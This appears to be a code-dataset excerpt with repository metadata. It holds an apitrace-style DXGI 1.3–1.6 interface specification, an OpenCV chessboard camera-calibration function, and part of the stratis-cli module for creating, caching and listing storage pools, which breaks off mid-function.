StdMethod(HRESULT, "PresentBuffer", [(UINT, "BufferToPresent"), (UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "SetSourceRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetTargetRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetDestSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetTargetRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetDestSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetColorSpace", [(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "ColorSpace")]),
StdMethod(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "GetColorSpace", [], sideeffects=False),
]
IDXGIFactoryMedia = Interface("IDXGIFactoryMedia", IUnknown)
IDXGIFactoryMedia.methods += [
StdMethod(HRESULT, "CreateSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateDecodeSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(DXGI_DECODE_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIResource), "pYuvDecodeBuffers"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGIDecodeSwapChain)), "ppSwapChain")]),
]
DXGI_FRAME_PRESENTATION_MODE = Enum("DXGI_FRAME_PRESENTATION_MODE", [
"DXGI_FRAME_PRESENTATION_MODE_COMPOSED",
"DXGI_FRAME_PRESENTATION_MODE_OVERLAY",
"DXGI_FRAME_PRESENTATION_MODE_NONE",
])
DXGI_FRAME_STATISTICS_MEDIA = Struct("DXGI_FRAME_STATISTICS_MEDIA", [
(UINT, "PresentCount"),
(UINT, "PresentRefreshCount"),
(UINT, "SyncRefreshCount"),
(LARGE_INTEGER, "SyncQPCTime"),
(LARGE_INTEGER, "SyncGPUTime"),
(DXGI_FRAME_PRESENTATION_MODE, "CompositionMode"),
(UINT, "ApprovedPresentDuration"),
])
IDXGISwapChainMedia = Interface("IDXGISwapChainMedia", IUnknown)
IDXGISwapChainMedia.methods += [
StdMethod(HRESULT, "GetFrameStatisticsMedia", [Out(Pointer(DXGI_FRAME_STATISTICS_MEDIA), "pStats")], sideeffects=False),
StdMethod(HRESULT, "SetPresentDuration", [(UINT, "Duration")]),
StdMethod(HRESULT, "CheckPresentDurationSupport", [(UINT, "DesiredPresentDuration"), Out(Pointer(UINT), "pClosestSmallerPresentDuration"), Out(Pointer(UINT), "pClosestLargerPresentDuration")], sideeffects=False),
]
DXGI_OVERLAY_SUPPORT_FLAG = FakeEnum(UINT, [
"DXGI_OVERLAY_SUPPORT_FLAG_DIRECT",
"DXGI_OVERLAY_SUPPORT_FLAG_SCALING",
])
IDXGIOutput3 = Interface("IDXGIOutput3", IDXGIOutput2)
IDXGIOutput3.methods += [
StdMethod(HRESULT, "CheckOverlaySupport", [(DXGI_FORMAT, "EnumFormat"), (ObjPointer(IUnknown), "pConcernedDevice"), Out(Pointer(DXGI_OVERLAY_SUPPORT_FLAG), "pFlags")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIDevice3,
IDXGISwapChain2,
IDXGISwapChainMedia,
IDXGIOutput3,
IDXGIFactory3,
IDXGIFactoryMedia,
])
#
# Undocumented interfaces
#
IDXGIFactoryDWM = Interface("IDXGIFactoryDWM", IUnknown)
IDXGISwapChainDWM = Interface("IDXGISwapChainDWM", IDXGIDeviceSubObject)
IDXGIFactoryDWM.methods += [
StdMethod(HRESULT, "CreateSwapChain", [(ObjPointer(IUnknown), "pDevice"), (Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIOutput), "pOutput"), Out(Pointer(ObjPointer(IDXGISwapChainDWM)), "ppSwapChain")]),
]
# http://shchetinin.blogspot.co.uk/2012/04/dwm-graphics-directx-win8win7.html
IDXGISwapChainDWM.methods += [
StdMethod(HRESULT, "Present", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "GetBuffer", [(UINT, "Buffer"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppSurface")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "ResizeBuffers", [(UINT, "BufferCount"), (UINT, "Width"), (UINT, "Height"), (DXGI_FORMAT, "NewFormat"), (DXGI_SWAP_CHAIN_FLAG, "SwapChainFlags")]),
StdMethod(HRESULT, "ResizeTarget", [(Pointer(Const(DXGI_MODE_DESC)), "pNewTargetParameters")]),
StdMethod(HRESULT, "GetContainingOutput", [Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
StdMethod(HRESULT, "GetLastPresentCount", [Out(Pointer(UINT), "pLastPresentCount")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIFactoryDWM,
])
#
# DXGI 1.4
#
DXGI_COLOR_SPACE_TYPE = Enum('DXGI_COLOR_SPACE_TYPE', [
'DXGI_COLOR_SPACE_RGB_FULL_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_FULL_G10_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P2020',
'DXGI_COLOR_SPACE_RESERVED',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_NONE_P709_X601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_CUSTOM',
])
DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_OVERLAY_PRESENT',
])
DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
])
DXGI_MEMORY_SEGMENT_GROUP = Enum('DXGI_MEMORY_SEGMENT_GROUP', [
'DXGI_MEMORY_SEGMENT_GROUP_LOCAL',
'DXGI_MEMORY_SEGMENT_GROUP_NON_LOCAL',
])
DXGI_QUERY_VIDEO_MEMORY_INFO = Struct('DXGI_QUERY_VIDEO_MEMORY_INFO', [
(UINT64, 'Budget'),
(UINT64, 'CurrentUsage'),
(UINT64, 'AvailableForReservation'),
(UINT64, 'CurrentReservation'),
])
IDXGISwapChain3 = Interface('IDXGISwapChain3', IDXGISwapChain2)
IDXGIOutput4 = Interface('IDXGIOutput4', IDXGIOutput3)
IDXGIFactory4 = Interface('IDXGIFactory4', IDXGIFactory3)
IDXGIAdapter3 = Interface('IDXGIAdapter3', IDXGIAdapter2)
IDXGISwapChain3.methods += [
StdMethod(UINT, 'GetCurrentBackBufferIndex', []),
StdMethod(HRESULT, 'CheckColorSpaceSupport', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), Out(Pointer(UINT), 'pColorSpaceSupport')], sideeffects=False),
StdMethod(HRESULT, 'SetColorSpace1', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace')]),
StdMethod(HRESULT, 'ResizeBuffers1', [(UINT, 'BufferCount'), (UINT, 'Width'), (UINT, 'Height'), (DXGI_FORMAT, 'Format'), (DXGI_SWAP_CHAIN_FLAG, 'SwapChainFlags'), (Pointer(Const(UINT)), 'pCreationNodeMask'), (Array(Const(ObjPointer(IUnknown)), 'BufferCount'), 'ppPresentQueue')]),
]
IDXGIOutput4.methods += [
StdMethod(HRESULT, 'CheckOverlayColorSpaceSupport', [(DXGI_FORMAT, 'Format'), (DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), (ObjPointer(IUnknown), 'pConcernedDevice'), Out(Pointer(UINT), 'pFlags')], sideeffects=False),
]
IDXGIFactory4.methods += [
StdMethod(HRESULT, 'EnumAdapterByLuid', [(LUID, 'AdapterLuid'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
StdMethod(HRESULT, 'EnumWarpAdapter', [(REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
IDXGIAdapter3.methods += [
StdMethod(HRESULT, 'RegisterHardwareContentProtectionTeardownStatusEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
StdMethod(Void, 'UnregisterHardwareContentProtectionTeardownStatus', [(DWORD, 'dwCookie')], sideeffects=False),
StdMethod(HRESULT, 'QueryVideoMemoryInfo', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), Out(Pointer(DXGI_QUERY_VIDEO_MEMORY_INFO), 'pVideoMemoryInfo')], sideeffects=False),
StdMethod(HRESULT, 'SetVideoMemoryReservation', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), (UINT64, 'Reservation')]),
StdMethod(HRESULT, 'RegisterVideoMemoryBudgetChangeNotificationEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
StdMethod(Void, 'UnregisterVideoMemoryBudgetChangeNotification', [(DWORD, 'dwCookie')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGISwapChain3,
IDXGIOutput4,
IDXGIFactory4,
IDXGIAdapter3,
])
#
# DXGI 1.5
#
DXGI_HDR_METADATA_TYPE = Enum('DXGI_HDR_METADATA_TYPE', [
'DXGI_HDR_METADATA_TYPE_NONE',
'DXGI_HDR_METADATA_TYPE_HDR10',
])
DXGI_HDR_METADATA_HDR10 = Struct('DXGI_HDR_METADATA_HDR10', [
(Array(UINT16, 2), 'RedPrimary'),
(Array(UINT16, 2), 'GreenPrimary'),
(Array(UINT16, 2), 'BluePrimary'),
(Array(UINT16, 2), 'WhitePoint'),
(UINT, 'MaxMasteringLuminance'),
(UINT, 'MinMasteringLuminance'),
(UINT16, 'MaxContentLightLevel'),
(UINT16, 'MaxFrameAverageLightLevel'),
])
DXGI_OFFER_RESOURCE_FLAGS = FakeEnum(UINT, [
'DXGI_OFFER_RESOURCE_FLAG_ALLOW_DECOMMIT',
])
DXGI_RECLAIM_RESOURCE_RESULTS = Enum('DXGI_RECLAIM_RESOURCE_RESULTS', [
'DXGI_RECLAIM_RESOURCE_RESULT_OK',
'DXGI_RECLAIM_RESOURCE_RESULT_DISCARDED',
'DXGI_RECLAIM_RESOURCE_RESULT_NOT_COMMITTED',
])
DXGI_FEATURE, DXGI_FEATURE_DATA = EnumPolymorphic('DXGI_FEATURE', 'Feature', [
('DXGI_FEATURE_PRESENT_ALLOW_TEARING', Pointer(BOOL)),
], Blob(Void, "FeatureSupportDataSize"), False)
IDXGIOutput5 = Interface('IDXGIOutput5', IDXGIOutput4)
IDXGISwapChain4 = Interface('IDXGISwapChain4', IDXGISwapChain3)
IDXGIDevice4 = Interface('IDXGIDevice4', IDXGIDevice3)
IDXGIFactory5 = Interface('IDXGIFactory5', IDXGIFactory4)
IDXGIOutput5.methods += [
StdMethod(HRESULT, 'DuplicateOutput1', [(ObjPointer(IUnknown), 'pDevice'), (UINT, 'Flags'), (UINT, 'SupportedFormatsCount'), (Array(Const(DXGI_FORMAT), 'SupportedFormatsCount'), 'pSupportedFormats'), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), 'ppOutputDuplication')]),
]
IDXGISwapChain4.methods += [
StdMethod(HRESULT, 'SetHDRMetaData', [(DXGI_HDR_METADATA_TYPE, 'Type'), (UINT, 'Size'), (Blob(Void, 'Size'), 'pMetaData')]),
]
IDXGIDevice4.methods += [
StdMethod(HRESULT, 'OfferResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), (DXGI_OFFER_RESOURCE_PRIORITY, 'Priority'), (DXGI_OFFER_RESOURCE_FLAGS, 'Flags')]),
StdMethod(HRESULT, 'ReclaimResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), Out(Array(DXGI_RECLAIM_RESOURCE_RESULTS, 'NumResources'), 'pResults')]),
]
IDXGIFactory5.methods += [
StdMethod(HRESULT, 'CheckFeatureSupport', [(DXGI_FEATURE, 'Feature'), Out(DXGI_FEATURE_DATA, 'pFeatureSupportData'), (UINT, 'FeatureSupportDataSize')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIOutput5,
IDXGISwapChain4,
IDXGIDevice4,
IDXGIFactory5,
])
#
# DXGI 1.6
#
DXGI_ADAPTER_FLAG3 = Enum('DXGI_ADAPTER_FLAG3', [
'DXGI_ADAPTER_FLAG3_NONE',
'DXGI_ADAPTER_FLAG3_REMOTE',
'DXGI_ADAPTER_FLAG3_SOFTWARE',
'DXGI_ADAPTER_FLAG3_ACG_COMPATIBLE',
'DXGI_ADAPTER_FLAG3_FORCE_DWORD',
'DXGI_ADAPTER_FLAG3_SUPPORT_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_SUPPORT_NON_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_KEYED_MUTEX_CONFORMANCE',
])
DXGI_ADAPTER_DESC3 = Struct('DXGI_ADAPTER_DESC3', [
(WString, 'Description'),
(UINT, 'VendorId'),
(UINT, 'DeviceId'),
(UINT, 'SubSysId'),
(UINT, 'Revision'),
(SIZE_T, 'DedicatedVideoMemory'),
(SIZE_T, 'DedicatedSystemMemory'),
(SIZE_T, 'SharedSystemMemory'),
(LUID, 'AdapterLuid'),
(DXGI_ADAPTER_FLAG3, 'Flags'),
(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, 'GraphicsPreemptionGranularity'),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, 'ComputePreemptionGranularity'),
])
DXGI_OUTPUT_DESC1 = Struct('DXGI_OUTPUT_DESC1', [
(WString, 'DeviceName'),
(RECT, 'DesktopCoordinates'),
(BOOL, 'AttachedToDesktop'),
(DXGI_MODE_ROTATION, 'Rotation'),
(HMONITOR, 'Monitor'),
(UINT, 'BitsPerColor'),
(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'),
(Array(FLOAT, 2), 'RedPrimary'),
(Array(FLOAT, 2), 'GreenPrimary'),
(Array(FLOAT, 2), 'BluePrimary'),
(Array(FLOAT, 2), 'WhitePoint'),
(FLOAT, 'MinLuminance'),
(FLOAT, 'MaxLuminance'),
(FLOAT, 'MaxFullFrameLuminance'),
])
DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS = Flags(UINT, [
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_FULLSCREEN',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_WINDOWED',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_CURSOR_STRETCHED',
])
DXGI_GPU_PREFERENCE = Enum('DXGI_GPU_PREFERENCE', [
'DXGI_GPU_PREFERENCE_UNSPECIFIED',
'DXGI_GPU_PREFERENCE_MINIMUM_POWER',
'DXGI_GPU_PREFERENCE_HIGH_PERFORMANCE',
])
IDXGIFactory6 = Interface('IDXGIFactory6', IDXGIFactory5)
IDXGIAdapter4 = Interface('IDXGIAdapter4', IDXGIAdapter3)
IDXGIOutput6 = Interface('IDXGIOutput6', IDXGIOutput5)
IDXGIAdapter4.methods += [
StdMethod(HRESULT, 'GetDesc3', [Out(Pointer(DXGI_ADAPTER_DESC3), 'pDesc')], sideeffects=False),
]
IDXGIOutput6.methods += [
StdMethod(HRESULT, 'GetDesc1', [Out(Pointer(DXGI_OUTPUT_DESC1), 'pDesc')], sideeffects=False),
StdMethod(HRESULT, 'CheckHardwareCompositionSupport', [Out(Pointer(DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS), 'pFlags')], sideeffects=False),
]
IDXGIFactory6.methods += [
StdMethod(HRESULT, 'EnumAdapterByGpuPreference', [(UINT, 'Adapter'), (DXGI_GPU_PREFERENCE, 'GpuPreference'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
dxgi.addInterfaces([
IDXGIFactory6,
IDXGIAdapter4,
IDXGIOutput6,
])
dxgi.addFunctions([
StdFunction(HRESULT, "DXGIDeclareAdapterRemovalSupport", [], sideeffects=False),
])
| [] |
nitchith/CarND-Advanced-Lane-Lines | code/camera_calib.py | 8e9e4d369f95f2076aa3b99c9015ac95c20037fc | import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
def camera_calibrate(images_list, nx=9, ny=6, show_corners=False):
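    """Find chessboard corners in every image matching images_list and run cv2.calibrateCamera."""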
    # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ...., (nx-1, ny-1, 0)
objp = np.zeros((ny*nx,3), np.float32)
objp[:,:2] = np.mgrid[0:nx,0:ny].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob(images_list)
if show_corners:
fig = plt.figure(figsize=(30, 30))
rows = 5
cols = 4
# Step through the list and search for chessboard corners
for idx, fname in enumerate(images):
img = cv2.imread(fname)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (nx,ny),None)
# If found, add object points, image points
if ret == True:
objpoints.append(objp)
imgpoints.append(corners)
# Draw and display the corners
if show_corners:
img = cv2.drawChessboardCorners(img, (nx,ny), corners, ret)
ax = plt.subplot(rows, cols, idx + 1)
ax.set_title(fname)
plt.imshow(img)
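    # cv2.calibrateCamera returns (rms_error, camera_matrix, dist_coeffs, rvecs, tvecs)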
return cv2.calibrateCamera(objpoints, imgpoints, gray.shape[1::-1], None, None) | [((8, 11, 8, 42), 'numpy.zeros', 'np.zeros', ({(8, 20, 8, 29): '(ny * nx, 3)', (8, 31, 8, 41): 'np.float32'}, {}), '((ny * nx, 3), np.float32)', True, 'import numpy as np\n'), ((16, 13, 16, 35), 'glob.glob', 'glob.glob', ({(16, 23, 16, 34): 'images_list'}, {}), '(images_list)', False, 'import glob\n'), ((43, 11, 43, 83), 'cv2.calibrateCamera', 'cv2.calibrateCamera', ({(43, 31, 43, 40): 'objpoints', (43, 42, 43, 51): 'imgpoints', (43, 53, 43, 70): 'gray.shape[1::-1]', (43, 72, 43, 76): 'None', (43, 78, 43, 82): 'None'}, {}), '(objpoints, imgpoints, gray.shape[1::-1], None, None)', False, 'import cv2\n'), ((19, 14, 19, 42), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((25, 14, 25, 31), 'cv2.imread', 'cv2.imread', ({(25, 25, 25, 30): 'fname'}, {}), '(fname)', False, 'import cv2\n'), ((26, 15, 26, 51), 'cv2.cvtColor', 'cv2.cvtColor', ({(26, 28, 26, 31): 'img', (26, 32, 26, 50): 'cv2.COLOR_BGR2GRAY'}, {}), '(img, cv2.COLOR_BGR2GRAY)', False, 'import cv2\n'), ((29, 23, 29, 68), 'cv2.findChessboardCorners', 'cv2.findChessboardCorners', ({(29, 49, 29, 53): 'gray', (29, 55, 29, 62): '(nx, ny)', (29, 63, 29, 67): 'None'}, {}), '(gray, (nx, ny), None)', False, 'import cv2\n'), ((38, 22, 38, 75), 'cv2.drawChessboardCorners', 'cv2.drawChessboardCorners', ({(38, 48, 38, 51): 'img', (38, 53, 38, 60): '(nx, ny)', (38, 62, 38, 69): 'corners', (38, 71, 38, 74): 'ret'}, {}), '(img, (nx, ny), corners, ret)', False, 'import cv2\n'), ((39, 21, 39, 53), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(39, 33, 39, 37): 'rows', (39, 39, 39, 43): 'cols', (39, 45, 39, 52): 'idx + 1'}, {}), '(rows, cols, idx + 1)', True, 'import matplotlib.pyplot as plt\n'), ((41, 16, 41, 31), 'matplotlib.pyplot.imshow', 'plt.imshow', ({(41, 27, 41, 30): 'img'}, {}), '(img)', True, 'import matplotlib.pyplot as plt\n')] |
MathiasStadler/docker-jenkins-scripted | python-jenkins/yaml_read_config/custom_log.py | 3f908987ab0428dd2239b524150ff3b65c71104c | """ module logging"""
# logging
| [] |
stratis-storage/stratis-cli | src/stratis_cli/_actions/_pool.py | 16efcfe50558785ff44a1570ca554edb2006f8d2 | # Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Pool actions.
"""
# isort: STDLIB
import os
from collections import defaultdict
# isort: THIRDPARTY
from justbytes import Range
from .._constants import PoolMaintenanceErrorCode
from .._errors import (
StratisCliAggregateError,
StratisCliEngineError,
StratisCliIncoherenceError,
StratisCliInUseOtherTierError,
StratisCliInUseSameTierError,
StratisCliNameConflictError,
StratisCliNoChangeError,
StratisCliPartialChangeError,
StratisCliPartialFailureError,
)
from .._stratisd_constants import BlockDevTiers, PoolActionAvailability, StratisdErrors
from ._connection import get_object
from ._constants import TOP_OBJECT
from ._formatting import get_property, print_table, size_triple, to_hyphenated
from ._utils import get_clevis_info
def _generate_pools_to_blockdevs(managed_objects, to_be_added, tier):
"""
Generate a map of pools to which block devices they own
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param tier: tier to search for blockdevs to be added
:type tier: _stratisd_constants.BlockDevTiers
:returns: a map of pool names to sets of strings containing blockdevs they own
:rtype: dict of str * frozenset of str
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, MOPool, devs, pools
pool_map = dict(
(path, str(MOPool(info).Name()))
for (path, info) in pools().search(managed_objects)
)
pools_to_blockdevs = defaultdict(list)
for modev in (
modev
for modev in (
MODev(info)
for (_, info) in devs(props={"Tier": tier}).search(managed_objects)
)
if str(modev.Devnode()) in to_be_added
):
pools_to_blockdevs[pool_map[modev.Pool()]].append(str(modev.Devnode()))
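    # Illustrative result (hypothetical devnodes): {"pool1": frozenset({"/dev/sdb", "/dev/sdc"})}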
return dict(
(pool, frozenset(blockdevs)) for pool, blockdevs in pools_to_blockdevs.items()
)
def _check_opposite_tier(managed_objects, to_be_added, other_tier):
"""
Check whether specified blockdevs are already in the other tier.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param other_tier: the other tier, not the one requested
:type other_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliInUseOtherTierError: if blockdevs are used by other tier
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, other_tier
)
if pools_to_blockdevs != {}:
raise StratisCliInUseOtherTierError(
pools_to_blockdevs,
BlockDevTiers.DATA
if other_tier == BlockDevTiers.CACHE
else BlockDevTiers.CACHE,
)
def _check_same_tier(pool_name, managed_objects, to_be_added, this_tier):
"""
Check whether specified blockdevs are already in the tier to which they
are to be added.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param this_tier: the tier requested
:type this_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliPartialChangeError: if blockdevs are used by this tier
:raises StratisCliInUseSameTierError: if blockdevs are used by this tier in another pool
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, this_tier
)
owned_by_current_pool = frozenset(pools_to_blockdevs.get(pool_name, []))
owned_by_other_pools = dict(
(pool, devnodes)
for pool, devnodes in pools_to_blockdevs.items()
if pool_name != pool
)
if owned_by_current_pool != frozenset():
raise StratisCliPartialChangeError(
"add to cache" if this_tier == BlockDevTiers.CACHE else "add to data",
to_be_added.difference(owned_by_current_pool),
to_be_added.intersection(owned_by_current_pool),
)
if owned_by_other_pools != {}:
raise StratisCliInUseSameTierError(owned_by_other_pools, this_tier)
def _fetch_locked_pools_property(proxy):
"""
Fetch the LockedPools property from stratisd.
:param proxy: proxy to the top object in stratisd
:return: a representation of unlocked devices
:rtype: dict
:raises StratisCliEngineError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
return Manager.Properties.LockedPools.Get(proxy)
class PoolActions:
"""
Pool actions.
"""
@staticmethod
def create_pool(namespace):
"""
Create a stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliNameConflictError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
names = pools(props={"Name": pool_name}).search(managed_objects)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
if list(names) != []:
raise StratisCliNameConflictError("pool", pool_name)
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.DATA)
clevis_info = get_clevis_info(namespace)
((changed, (_, _)), return_code, message) = Manager.Methods.CreatePool(
proxy,
{
"name": pool_name,
"redundancy": (True, 0),
"devices": blockdevs,
"key_desc": (
(True, namespace.key_desc)
if namespace.key_desc is not None
else (False, "")
),
"clevis_info": (False, ("", ""))
if clevis_info is None
else (True, clevis_info),
},
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to create the specified pool %s but stratisd "
"reports that it did not actually create the pool"
)
% pool_name
)
@staticmethod
def init_cache(namespace): # pylint: disable=too-many-locals
"""
Initialize the cache of an existing stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
(pool_object_path, _) = next(
pools(props={"Name": pool_name})
.require_unique_match(True)
.search(managed_objects)
)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE)
((changed, devs_added), return_code, message) = Pool.Methods.InitCache(
get_object(pool_object_path), {"devices": blockdevs}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs as cache "
"to pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def list_pools(namespace):
"""
List all stratis pools.
"""
# pylint: disable=import-outside-toplevel
from ._data import MOPool, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pools_with_props = [
MOPool(info) for objpath, info in pools().search(managed_objects)
]
def physical_size_triple(mopool):
"""
Calculate the triple to display for total physical size.
The format is total/used/free where the display value for each
member of the tuple are chosen automatically according to justbytes'
configuration.
:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:returns: a string to display in the resulting list output
:rtype: str
"""
total_physical_size = Range(mopool.TotalPhysicalSize())
total_physical_used = get_property(mopool.TotalPhysicalUsed(), Range, None)
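            # Illustrative output of size_triple: "2 TiB / 512 GiB / 1.50 TiB" (exact units depend on justbytes)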
return size_triple(total_physical_size, total_physical_used)
def properties_string(mopool):
"""
Make a string encoding some important properties of the pool
:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:param props_map: a map of properties returned by GetAllProperties
:type props_map: dict of str * any
"""
def gen_string(has_property, code):
"""
Generate the display string for a boolean property
:param has_property: whether the property is true or false
:type has_property: bool or NoneType
:param str code: the code to generate the string for
:returns: the generated string
:rtype: str
"""
if has_property == True: # pylint: disable=singleton-comparison
prefix = " "
elif has_property == False: # pylint: disable=singleton-comparison
